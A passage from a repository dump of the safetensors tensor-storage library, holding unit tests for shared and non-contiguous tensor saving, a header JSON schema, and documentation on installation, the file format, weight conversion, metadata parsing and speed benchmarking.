self.assertEqual(_find_shared_tensors({"C": C, "D": D}), []) 84 | self.assertEqual(_find_shared_tensors({"C": C}), []) 85 | self.assertEqual(_find_shared_tensors({"D": D}), []) 86 | 87 | def test_find_shared_non_shared_tensors(self): 88 | A = torch.zeros((4,)) 89 | B = A[:2] 90 | C = A[2:] 91 | # Shared storage but do not overlap 92 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}]) 93 | 94 | B = A[:2] 95 | C = A[1:] 96 | # Shared storage but *do* overlap 97 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}]) 98 | 99 | B = A[:2] 100 | C = A[2:] 101 | D = A[:1] 102 | # Shared storage but *do* overlap 103 | self.assertEqual(_find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}]) 104 | 105 | def test_end_ptr(self): 106 | A = torch.zeros((4,)) 107 | start = A.data_ptr() 108 | end = _end_ptr(A) 109 | self.assertEqual(end - start, 16) 110 | B = torch.zeros((16,)) 111 | A = B[::4] 112 | start = A.data_ptr() 113 | end = 
_end_ptr(A)
114 |         # Jump 3 times 16 bytes (the stride of B)
115 |         # Then add the size of the datapoint 4 bytes
116 |         self.assertEqual(end - start, 16 * 3 + 4)
117 | 
118 |         # FLOAT16
119 |         A = torch.zeros((4,), dtype=torch.float16)
120 |         start = A.data_ptr()
121 |         end = _end_ptr(A)
122 |         self.assertEqual(end - start, 8)
123 |         B = torch.zeros((16,), dtype=torch.float16)
124 |         A = B[::4]
125 |         start = A.data_ptr()
126 |         end = _end_ptr(A)
127 |         # Jump 3 times 8 bytes (the stride of B)
128 |         # Then add the size of the datapoint 2 bytes
129 |         self.assertEqual(end - start, 8 * 3 + 2)
130 | 
131 |     def test_remove_duplicate_names(self):
132 |         A = torch.zeros((3, 3))
133 |         B = A[:1, :]
134 | 
135 |         self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]})
136 |         self.assertEqual(_remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]})
137 |         with self.assertRaises(RuntimeError):
138 |             self.assertEqual(_remove_duplicate_names({"B": B}), [])
139 | 
140 |     def test_failure(self):
141 |         model = Model()
142 |         with self.assertRaises(RuntimeError):
143 |             save_file(model.state_dict(), "tmp.safetensors")
144 | 
145 |     # def test_workaround_refuse(self):
146 |     #     model = Model()
147 |     #     A = torch.zeros((1000, 10))
148 |     #     a = A[:100, :]
149 |     #     model.a.weight = torch.nn.Parameter(a)
150 |     #     with self.assertRaises(RuntimeError) as ctx:
151 |     #         save_model(model, "tmp4.safetensors")
152 |     #     self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception))
153 | 
154 |     def test_save(self):
155 |         # Just testing the actual saved file to make sure we're ok on big endian
156 |         model = OnesModel()
157 |         save_model(model, "tmp_ones.safetensors")
158 |         with safe_open("tmp_ones.safetensors", framework="pt") as f:
159 |             self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
160 | 
161 |             # 192 hardcoded to skip the header (the 8-byte header-length prefix plus the JSON header); metadata order is random.
162 |             self.assertEqual(
163 |                 open("tmp_ones.safetensors", "rb").read()[192:],
164 |                 b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""",
165 |             )
166 | 
167 |         model2 = OnesModel()
168 |         load_model(model2, "tmp_ones.safetensors")
169 | 
170 |         state_dict = model.state_dict()
171 |         for k, v in model2.state_dict().items():
172 |             torch.testing.assert_close(v, state_dict[k])
173 | 
174 |     def test_workaround(self):
175 |         model = Model()
176 |         save_model(model, "tmp.safetensors")
177 |         with safe_open("tmp.safetensors", framework="pt") as f:
178 |             self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"})
179 | 
180 |         model2 = Model()
181 |         load_model(model2, "tmp.safetensors")
182 | 
183 |         state_dict = model.state_dict()
184 |         for k, v in model2.state_dict().items():
185 |             torch.testing.assert_close(v, state_dict[k])
186 | 
187 |     def test_workaround_works_with_different_on_file_names(self):
188 |         model = Model()
189 |         state_dict = model.state_dict()
190 |         state_dict.pop("a.weight")
191 |         state_dict.pop("a.bias")
192 |         save_file(state_dict, "tmp.safetensors")
193 | 
194 |         model2 = Model()
195 |         load_model(model2, "tmp.safetensors")
196 | 
197 |         state_dict = model.state_dict()
198 |         for k, v in model2.state_dict().items():
199 |             torch.testing.assert_close(v, state_dict[k])
200 | 
201 |     def test_workaround_non_contiguous(self):
202 |         model = NonContiguousModel()
203 | 
204 |         with self.assertRaises(ValueError) as ctx:
205 |             save_model(model, "tmp_c.safetensors", force_contiguous=False)
206 |         self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception))
207 |         save_model(model, "tmp_c.safetensors", force_contiguous=True)
208 | 
209 |         model2 = NonContiguousModel()
210 |         load_model(model2, "tmp_c.safetensors")
211 | 
212 |         state_dict = model.state_dict()
213 |         for k, v in model2.state_dict().items():
214 |             torch.testing.assert_close(v, state_dict[k])
215 | 
216 |     def test_workaround_copy(self):
217 |         model = CopyModel()
218 |         self.assertEqual(
219 |             _find_shared_tensors(model.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
220 |         )
221 |         save_model(model, "tmp.safetensors")
222 | 
223 |         model2 = CopyModel()
224 |         load_model(model2, "tmp.safetensors")
225 | 
226 |         state_dict = model.state_dict()
227 |         for k, v in model2.state_dict().items():
228 |             torch.testing.assert_close(v, state_dict[k])
229 | 
230 |     def test_difference_with_torch(self):
231 |         model = Model()
232 |         torch.save(model.state_dict(), "tmp2.bin")
233 | 
234 |         model2 = NoSharedModel()
235 |         # This passes on torch.
236 |         # The tensors are shared on disk, but they are *not* shared within the model.
237 |         # The model happily loads the tensors, and ends up *not* sharing them, by
238 |         # doing copies instead.
239 |         self.assertEqual(
240 |             _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
241 |         )
242 |         model2.load_state_dict(torch.load("tmp2.bin"))
243 |         self.assertEqual(
244 |             _find_shared_tensors(model2.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}]
245 |         )
246 | 
247 |         # However safetensors cannot save those, so we cannot
248 |         # reload the saved file with the different model
249 |         save_model(model, "tmp2.safetensors")
250 |         with self.assertRaises(RuntimeError) as ctx:
251 |             load_model(model2, "tmp2.safetensors")
252 |         self.assertIn("""Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception))
253 | 
254 |     def test_difference_torch_odd(self):
255 |         model = NoSharedModel()
256 |         a = model.a.weight
257 |         b = model.b.weight
258 |         self.assertNotEqual(a.data_ptr(), b.data_ptr())
259 |         torch.save(model.state_dict(), "tmp3.bin")
260 | 
261 |         model2 = Model()
262 |         self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}])
263 |         # Torch will assign either `b` or `a` to the shared tensor in `model2`
264 |         model2.load_state_dict(torch.load("tmp3.bin"))
265 | 
266 |         # XXX: model2 uses only the B weight not the A weight anymore.
267 |         self.assertFalse(torch.allclose(model2.a.weight, model.a.weight))
268 |         torch.testing.assert_close(model2.a.weight, model.b.weight)
269 |         self.assertEqual(_find_shared_tensors(model2.state_dict()), [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}])
270 | 
271 |         # Everything is saved as-is
272 |         save_model(model, "tmp3.safetensors")
273 |         # safetensors will yell that there were 2 tensors on disk, while
274 |         # the model expects only 1 tensor since both are shared.
275 |         with self.assertRaises(RuntimeError) as ctx:
276 |             load_model(model2, "tmp3.safetensors")
277 |         # Safetensors properly warns the user that some keys are unexpected
278 |         self.assertIn("""Unexpected key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception))
--------------------------------------------------------------------------------
/bindings/python/tests/test_tf_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 | 
3 | import h5py
4 | import numpy as np
5 | import tensorflow as tf
6 | 
7 | from safetensors import safe_open
8 | from safetensors.tensorflow import load_file, save_file
9 | 
10 | 
11 | def _load(f, tensors=None, prefix=""):
12 |     if tensors is None:
13 |         tensors = {}
14 |     for k in f.keys():
15 |         if isinstance(f[k], h5py._hl.dataset.Dataset):
16 |             key = k if not prefix else f"{prefix}_{k}"
17 |             tensors[key] = tf.convert_to_tensor(np.array(f[k]))
18 |         else:
19 |             tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}"))
20 |     return tensors
21 | 
22 | 
23 | def _save(f, tensors, prefix=""):
24 |     for name, tensor in tensors.items():
25 |         tensor = tensor.numpy()
26 |         dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype)
27 |         dset[:] = tensor
28 | 
29 | 
30 | class SafeTestCase(unittest.TestCase):
31 |     def setUp(self):
32 |         data = {
33 |             "test": tf.zeros((1024, 1024), dtype=tf.float32),
34 |             "test2": tf.zeros((1024, 1024), dtype=tf.float32),
35 |             "test3": tf.zeros((1024, 1024), dtype=tf.float32),
36 |         }
37 |         self.tf_filename = "./tests/data/tf_load.h5"
38 |         self.sf_filename = "./tests/data/tf_load.safetensors"
39 | 
40 |         with h5py.File(self.tf_filename, "w") as f:
41 |             _save(f, data)
42 |         save_file(data, self.sf_filename)
43 | 
44 |     def test_zero_sized(self):
45 |         data = {
46 |             "test": 
tf.zeros((2, 0), dtype=tf.float32), 47 | } 48 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 49 | save_file(data.copy(), local) 50 | reloaded = load_file(local) 51 | # Empty tensor != empty tensor on numpy, so comparing shapes 52 | # instead 53 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 54 | 55 | def test_deserialization_safe(self): 56 | weights = load_file(self.sf_filename) 57 | 58 | with h5py.File(self.tf_filename, "r") as f: 59 | tf_weights = _load(f) 60 | 61 | for k, v in weights.items(): 62 | tv = tf_weights[k] 63 | self.assertTrue(np.allclose(v, tv)) 64 | 65 | def test_bfloat16(self): 66 | data = { 67 | "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16), 68 | } 69 | save_file(data, self.sf_filename) 70 | weights = {} 71 | with safe_open(self.sf_filename, framework="tf") as f: 72 | for k in f.keys(): 73 | weights[k] = f.get_tensor(k) 74 | 75 | for k, v in weights.items(): 76 | tv = data[k] 77 | self.assertTrue(tf.experimental.numpy.allclose(v, tv)) 78 | 79 | def test_deserialization_safe_open(self): 80 | weights = {} 81 | with safe_open(self.sf_filename, framework="tf") as f: 82 | for k in f.keys(): 83 | weights[k] = f.get_tensor(k) 84 | 85 | with h5py.File(self.tf_filename, "r") as f: 86 | tf_weights = _load(f) 87 | 88 | for k, v in weights.items(): 89 | tv = tf_weights[k] 90 | self.assertTrue(np.allclose(v, tv)) 91 | -------------------------------------------------------------------------------- /codecov.yaml: -------------------------------------------------------------------------------- 1 | comment: false 2 | -------------------------------------------------------------------------------- /codecov.yml: -------------------------------------------------------------------------------- 1 | comment: false 2 | -------------------------------------------------------------------------------- /docs/safetensors.schema.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://json-schema.org/draft/2020-12/schema", 3 | "title": "safetensors format header", 4 | "description": "Describes the structure of all the tensors and their metadata", 5 | "$defs": { 6 | "size_t": { 7 | "type": "integer", 8 | "minimum": 0, 9 | "maximum": 281474976710655, 10 | "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)" 11 | }, 12 | "Tensor": { 13 | "title": "Tensor", 14 | "description": "Describes the structure of one tensor", 15 | "type": "object", 16 | "additionalProperties": false, 17 | "properties": { 18 | "dtype": { 19 | "type": "string", 20 | "pattern": "([UIF])(8|16|32|64|128|256)", 21 | "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits." 22 | }, 23 | "shape": { 24 | "type": "array", 25 | "items": { 26 | "$ref": "#/$defs/size_t", 27 | "description": "Size of each dimension." 28 | } 29 | }, 30 | "data_offsets": { 31 | "type": "array", 32 | "prefixItems": [ 33 | { 34 | "$ref": "#/$defs/size_t", 35 | "description": "Start offset of the array. " 36 | }, 37 | { 38 | "$ref": "#/$defs/size_t", 39 | "description": "End offset of the array. Equal to the previous item + array size." 
40 |             }
41 |           ]
42 |         }
43 |       },
44 |       "required": [
45 |         "data_offsets",
46 |         "dtype",
47 |         "shape"
48 |       ]
49 |     },
50 |     "Metadata": {
51 |       "type": "object",
52 |       "additionalProperties": {"type": "string"},
53 |       "title": "Metadata"
54 |     }
55 |   },
56 |   "type": "object",
57 |   "properties": {
58 |     "__metadata__": {
59 |       "description": "Arbitrary metadata",
60 |       "$ref": "#/$defs/Metadata"
61 |     }
62 |   },
63 |   "additionalProperties": {
64 |     "$ref": "#/$defs/Tensor"
65 |   }
66 | }
67 | 
--------------------------------------------------------------------------------
/docs/source/_toctree.yml:
--------------------------------------------------------------------------------
1 | - sections:
2 |   - local: index
3 |     title: 🤗 Safetensors
4 |   - local: speed
5 |     title: Speed Comparison
6 |   - local: torch_shared_tensors
7 |     title: Tensor Sharing in Pytorch
8 |   - local: metadata_parsing
9 |     title: Metadata Parsing
10 |   - local: convert-weights
11 |     title: Convert weights to safetensors
12 |   title: Getting started
13 | - sections:
14 |   - local: api/torch
15 |     title: Torch API
16 |   - local: api/tensorflow
17 |     title: Tensorflow API
18 |   - local: api/paddle
19 |     title: PaddlePaddle API
20 |   - local: api/flax
21 |     title: Flax API
22 |   - local: api/numpy
23 |     title: Numpy API
24 |   title: API
--------------------------------------------------------------------------------
/docs/source/api/flax.mdx:
--------------------------------------------------------------------------------
1 | # Flax API
2 | 
3 | [[autodoc]] safetensors.flax.load_file
4 | [[autodoc]] safetensors.flax.load
5 | [[autodoc]] safetensors.flax.save_file
6 | [[autodoc]] safetensors.flax.save
--------------------------------------------------------------------------------
/docs/source/api/numpy.mdx:
--------------------------------------------------------------------------------
1 | # Numpy API
2 | 
3 | [[autodoc]] safetensors.numpy.load_file
4 | [[autodoc]] safetensors.numpy.load
5 | [[autodoc]] safetensors.numpy.save_file
6 | [[autodoc]] safetensors.numpy.save
--------------------------------------------------------------------------------
/docs/source/api/paddle.mdx:
--------------------------------------------------------------------------------
1 | # PaddlePaddle API
2 | 
3 | [[autodoc]] safetensors.paddle.load_file
4 | [[autodoc]] safetensors.paddle.load
5 | [[autodoc]] safetensors.paddle.save_file
6 | [[autodoc]] safetensors.paddle.save
--------------------------------------------------------------------------------
/docs/source/api/tensorflow.mdx:
--------------------------------------------------------------------------------
1 | # Tensorflow API
2 | 
3 | [[autodoc]] safetensors.tensorflow.load_file
4 | [[autodoc]] safetensors.tensorflow.load
5 | [[autodoc]] safetensors.tensorflow.save_file
6 | [[autodoc]] safetensors.tensorflow.save
--------------------------------------------------------------------------------
/docs/source/api/torch.mdx:
--------------------------------------------------------------------------------
1 | # Torch API
2 | 
3 | [[autodoc]] safetensors.torch.load_file
4 | [[autodoc]] safetensors.torch.load
5 | [[autodoc]] safetensors.torch.save_file
6 | [[autodoc]] safetensors.torch.save
7 | [[autodoc]] safetensors.torch.load_model
8 | [[autodoc]] safetensors.torch.save_model
--------------------------------------------------------------------------------
/docs/source/convert-weights.md:
--------------------------------------------------------------------------------
1 | # Convert weights to safetensors
2 | 
3 | PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensors` format, we recommend converting your weights to `.safetensors`.
4 | 
5 | The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), provided your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository.
6 | 
7 | 
8 | 
9 | For larger models, the Space may be a bit slower because its resources are tied up converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights; a minimal sketch of the same idea follows below.
10 | 
11 | Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space.
12 | 
13 | 
14 | 
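If you prefer not to rely on the Space, the core of the conversion can be sketched in a few lines of Python. This is a simplified illustration, not the full `convert.py` (which also handles sharded checkpoints, shared tensors, and opening the Pull Request); `pytorch_model.bin` and `model.safetensors` are placeholder file names:

```python
import torch
from safetensors.torch import save_file

# Load the pickled checkpoint. Only do this with weights you trust:
# unpickling arbitrary files is exactly the risk safetensors avoids.
state_dict = torch.load("pytorch_model.bin", map_location="cpu")

# safetensors refuses to serialize shared tensors, so give every tensor
# its own contiguous memory before saving.
state_dict = {name: tensor.contiguous().clone() for name, tensor in state_dict.items()}

save_file(state_dict, "model.safetensors")
```

--------------------------------------------------------------------------------
/docs/source/index.mdx:
--------------------------------------------------------------------------------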
7 | 
8 | # Safetensors
9 | 
10 | Safetensors is a new, simple format for storing tensors safely (as opposed to pickle) while remaining fast (zero-copy). Safetensors is really [fast 🚀](./speed).
11 | 
12 | ## Installation
13 | 
14 | with pip:
15 | ```
16 | pip install safetensors
17 | ```
18 | 
19 | with conda:
20 | ```
21 | conda install -c huggingface safetensors
22 | ```
23 | 
24 | ## Usage
25 | 
26 | ### Load tensors
27 | 
28 | ```python
29 | from safetensors import safe_open
30 | 
31 | tensors = {}
32 | with safe_open("model.safetensors", framework="pt", device=0) as f:
33 |     for k in f.keys():
34 |         tensors[k] = f.get_tensor(k)
35 | ```
36 | 
37 | Loading only part of the tensors (useful when running on multiple GPUs):
38 | 
39 | ```python
40 | from safetensors import safe_open
41 | 
42 | tensors = {}
43 | with safe_open("model.safetensors", framework="pt", device=0) as f:
44 |     tensor_slice = f.get_slice("embedding")
45 |     vocab_size, hidden_dim = tensor_slice.get_shape()
46 |     tensor = tensor_slice[:, :hidden_dim]
47 | ```
48 | 
49 | ### Save tensors
50 | 
51 | ```python
52 | import torch
53 | from safetensors.torch import save_file
54 | 
55 | tensors = {
56 |     "embedding": torch.zeros((2, 2)),
57 |     "attention": torch.zeros((2, 3))
58 | }
59 | save_file(tensors, "model.safetensors")
60 | ```
61 | 
62 | ## Format
63 | 
64 | Let's say you have a safetensors file named `model.safetensors`; then `model.safetensors` will have the following internal format:
65 | 
66 | 
67 | (Figure: safetensors file layout. An 8-byte little-endian unsigned integer gives the header size, followed by the JSON header describing each tensor's `dtype`, `shape` and `data_offsets`, followed by a single byte buffer holding all tensor values.)
68 | 
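As a small, hands-on illustration of that layout (a sketch, not part of the official docs; the file name is just an example), you can write a tiny file and inspect its raw bytes:

```python
import json
import struct

import torch
from safetensors.torch import save_file

save_file({"embedding": torch.zeros((2, 2))}, "model.safetensors")

with open("model.safetensors", "rb") as f:
    raw = f.read()

# The first 8 bytes hold the header size, as a little-endian unsigned 64-bit int
(header_size,) = struct.unpack("<Q", raw[:8])
# The next `header_size` bytes are the JSON header
print(json.loads(raw[8 : 8 + header_size]))
# Expected output for a single 2x2 F32 tensor (16 bytes of data):
# {'embedding': {'dtype': 'F32', 'shape': [2, 2], 'data_offsets': [0, 16]}}
# Everything after the header is a single byte buffer that `data_offsets`
# indexes into.
```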
69 | 
70 | ## Featured Projects
71 | 
72 | Safetensors is widely used at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors:
73 | 
74 | * [huggingface/transformers](https://github.com/huggingface/transformers)
75 | * [ml-explore/mlx](https://github.com/ml-explore/mlx)
76 | * [huggingface/candle](https://github.com/huggingface/candle)
77 | * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui)
78 | * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537)
79 | * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix)
80 | * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI)
81 | * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models)
82 | * [CivitAI](https://civitai.com/)
83 | * [huggingface/diffusers](https://github.com/huggingface/diffusers)
84 | * [coreylowman/dfdx](https://github.com/coreylowman/dfdx)
85 | * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI)
86 | * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui)
87 | * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner)
88 | * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP)
89 | * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT)
90 | * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry)
91 | * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI)
92 | * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE)
93 | * [alvarobartt/safejax](https://github.com/alvarobartt/safejax)
94 | * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic)
95 | * [rachthree/safestructures](https://github.com/rachthree/safestructures)
96 | * [justinchuby/onnx-safetensors](https://github.com/justinchuby/onnx-safetensors)
97 | 
--------------------------------------------------------------------------------
/docs/source/metadata_parsing.mdx:
--------------------------------------------------------------------------------
1 | # Metadata Parsing
2 | 
3 | Given the simplicity of the format, it's very cheap and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests).
4 | 
5 | This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language.
6 | 
7 | ## Example use case
8 | 
9 | There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights:
10 | 
11 | 
12 | (Screenshots: Hub model pages displaying the parsed safetensors metadata, i.e. the list of tensors with their dtypes and shapes.)
13 | 
20 | 
21 | ## Usage
22 | 
23 | 
24 | 
25 | 
26 | From the [🤗 Hub](https://hf.co/models), you can get the metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In the example Python script below (you can use any language that supports HTTP requests), we parse the metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors).
27 | 
28 | ```python
29 | import requests # pip install requests
30 | import struct
31 | 
32 | def parse_single_file(url):
33 |     # Fetch the first 8 bytes of the file
34 |     headers = {'Range': 'bytes=0-7'}
35 |     response = requests.get(url, headers=headers)
36 |     # Interpret the bytes as a little-endian unsigned 64-bit integer
37 |     length_of_header = struct.unpack('<Q', response.content)[0]
38 |     # Fetch length_of_header bytes starting at the 9th byte
39 |     headers = {'Range': f'bytes=8-{7 + length_of_header}'}
40 |     response = requests.get(url, headers=headers)
41 |     # Interpret the response as a JSON object
42 |     header = response.json()
43 |     return header
44 | 
45 | url = "https://huggingface.co/gpt2/resolve/main/model.safetensors"
46 | header = parse_single_file(url)
47 | 
48 | print(header)
49 | # {
50 | #   "__metadata__": { "format": "pt" },
51 | #   "h.10.ln_1.weight": {
52 | #     "dtype": "F32",
53 | #     "shape": [768],
54 | #     "data_offsets": [223154176, 223157248]
55 | #   },
56 | #   ...
57 | # }
58 | ```
59 | 
60 | 
61 | 
62 | Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js)
63 | 
64 | ```ts
65 | import { parseSafetensorsMetadata } from "@huggingface/hub";
66 | 
67 | const info = await parseSafetensorsMetadata({
68 |   repo: { type: "model", name: "bigscience/bloom" },
69 | });
70 | 
71 | console.log(info)
72 | // {
73 | //   sharded: true,
74 | //   index: {
75 | //     metadata: { total_size: 352494542848 },
76 | //     weight_map: {
77 | //       'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors',
78 | //       ...
79 | //     }
80 | //   },
81 | //   headers: {
82 | //     __metadata__: {'format': 'pt'},
83 | //     'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]},
84 | //     ...
85 | //   }
86 | // }
87 | ```
88 | 
89 | Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be:
90 | 
91 | ```ts
92 | export type SafetensorsParseFromRepo =
93 |   | {
94 |       sharded: false;
95 |       header: SafetensorsFileHeader;
96 |     }
97 |   | {
98 |       sharded: true;
99 |       index: SafetensorsIndexJson;
100 |       headers: SafetensorsShardedHeaders;
101 |     };
102 | ```
103 | 
104 | where the underlying types are the following:
105 | 
106 | ```ts
107 | type FileName = string;
108 | 
109 | type TensorName = string;
110 | type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL";
111 | 
112 | interface TensorInfo {
113 |   dtype: Dtype;
114 |   shape: number[];
115 |   data_offsets: [number, number];
116 | }
117 | 
118 | type SafetensorsFileHeader = Record<TensorName, TensorInfo> & {
119 |   __metadata__: Record<string, string>;
120 | };
121 | 
122 | interface SafetensorsIndexJson {
123 |   weight_map: Record<TensorName, FileName>;
124 | }
125 | 
126 | export type SafetensorsShardedHeaders = Record<FileName, SafetensorsFileHeader>;
127 | ```
128 | 
129 | 
130 | 
131 | [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata.
132 | Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model.
133 | Depending on whether the model is sharded or not, one or multiple safetensors files will be parsed.
134 | 
135 | ```python
136 | >>> from huggingface_hub import get_safetensors_metadata
137 | 
138 | # Parse repo with single weights file
139 | >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m")
140 | >>> metadata
141 | SafetensorsRepoMetadata(
142 |     metadata=None,
143 |     sharded=False,
144 |     weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...},
145 |     files_metadata={'model.safetensors': SafetensorsFileMetadata(...)}
146 | )
147 | >>> metadata.files_metadata["model.safetensors"].metadata
148 | {'format': 'pt'}
149 | 
150 | # Parse repo with sharded model (i.e. multiple weights files)
151 | >>> metadata = get_safetensors_metadata("bigscience/bloom")
152 | Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s]
153 | >>> metadata
154 | SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...})
155 | >>> len(metadata.files_metadata)
156 | 72  # All safetensors files have been fetched
157 | 
158 | # Parse repo that is not a safetensors repo
159 | >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5")
160 | NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files.
161 | ```
162 | 
163 | To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata).
164 | 
165 | 
166 | 
167 | 
168 | ## Example output
169 | 
170 | For instance, here are the numbers of parameters per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage.
171 | 
172 | model | safetensors | params
173 | --- | --- | ---
174 | [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 }
175 | [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 }
176 | [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 }
177 | [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 }
178 | [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 }
179 | [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 }
180 | [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 }
181 | [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 }
182 | [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 }
183 | 
--------------------------------------------------------------------------------
/docs/source/speed.mdx:
--------------------------------------------------------------------------------
1 | # Speed Comparison
2 | 
3 | 
4 | (Open In Colab badge: a runnable notebook version of this benchmark)
5 | 
11 | `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. To run the [GPU benchmark](#gpu-benchmark), make sure your machine has a GPU, or that you have selected a GPU runtime if you are using Google Colab.
12 | 
13 | Before you begin, make sure you have all the necessary libraries installed:
14 | 
15 | ```bash
16 | pip install safetensors huggingface_hub torch
17 | ```
18 | 
19 | Let's start by importing all the packages that will be used:
20 | 
21 | ```py
22 | >>> import os
23 | >>> import datetime
24 | >>> from huggingface_hub import hf_hub_download
25 | >>> from safetensors.torch import load_file
26 | >>> import torch
27 | ```
28 | 
29 | Download the safetensors and torch weights for gpt2:
30 | 
31 | ```py
32 | >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors")
